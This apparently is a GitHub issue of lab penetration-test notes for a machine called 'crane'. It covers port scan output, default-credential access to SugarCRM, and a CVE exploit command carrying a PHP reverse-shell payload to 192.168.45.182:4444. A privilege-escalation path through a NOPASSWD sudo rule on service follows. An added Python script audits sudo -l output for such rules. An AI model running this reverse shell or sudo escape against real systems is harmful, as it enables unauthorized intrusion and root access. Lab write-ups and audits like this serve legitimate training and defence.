Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
33060/tcp open socks5 syn-ack ttl 61
3306/tcp --> mysql-empty-password: Host '192.168.45.182' is not allowed to connect to this MySQL server
80/tcp --> SugarCRM --> relevant exploit info: SugarCRM 12.2.0 - Remote Code Execution (RCE) (https://www.exploit-db.com/exploits/51187)
admin:admin login --> succeeded. Admin -> About page: version info v7.12.3, Sugar v6.5.25
Search SugarCRM 7.12 exploit info --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.182\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
www-data@crane:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
Keypoints:
SugarCRM 7.12 --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.182\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
Note: php -r <code> runs the given PHP <code> without using script tags <?..?>
[PE] service (https://gtfobins.github.io/gtfobins/service/)
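Added example, not part of WDavid404's issue: a small Python audit that parses `sudo -l` output and flags NOPASSWD rules on binaries that GTFOBins documents as shell escapes (the `service` entry above is exactly this case). The embedded sample is the sudo output pasted in the issue, constructed here as a string so the script runs offline; the binary list is an assumed short subset, not the full GTFOBins catalogue, and `parse_sudo_l`/`find_risky_rules` are names chosen for this example.

```python
"""Audit 'sudo -l' output for passwordless rules that hand out a shell.

Example code added to these notes; not from the original issue. The sample
text below is the sudo -l output from the issue, embedded as a constant so
the check runs offline.
"""
import re

# Assumption: a short subset of binaries GTFOBins lists as able to spawn a
# shell or run arbitrary commands under sudo. A real audit would load the
# full list rather than hard-code it.
SHELL_ESCAPE_BINARIES = {
    "service", "vim", "vi", "less", "more", "find", "awk", "python3", "perl",
    "env", "bash", "sh", "tar", "zip", "nmap", "man", "ftp", "git",
}

# Constructed sample: the sudo -l output from the issue, verbatim.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service
"""

# One sudoers rule line: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text):
    """Return (runas, tags, command) tuples from the 'may run' section."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True      # everything after this header is rules
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def find_risky_rules(text):
    """Flag NOPASSWD rules whose command is ALL or a known shell-escape binary."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0]              # drop any argument restriction
        name = binary.rsplit("/", 1)[-1]     # /usr/sbin/service -> service
        if "NOPASSWD" in tags and (cmd == "ALL" or name in SHELL_ESCAPE_BINARIES):
            findings.append({"runas": runas, "command": cmd, "binary": name})
    return findings


if __name__ == "__main__":
    for f in find_risky_rules(SAMPLE_SUDO_L):
        print(f"RISK: NOPASSWD as ({f['runas']}) for {f['command']} "
              f"-- {f['binary']} is a documented shell escape; "
              "require a password and/or pin the allowed arguments")
```

Run against the sample, the check reports the single `(ALL) NOPASSWD: /usr/sbin/service` rule. The fix on the host side is to drop NOPASSWD for that entry or restrict it to explicit arguments (e.g. only the specific unit it is meant to restart), since an unrestricted `service` invocation is listed on GTFOBins for a reason.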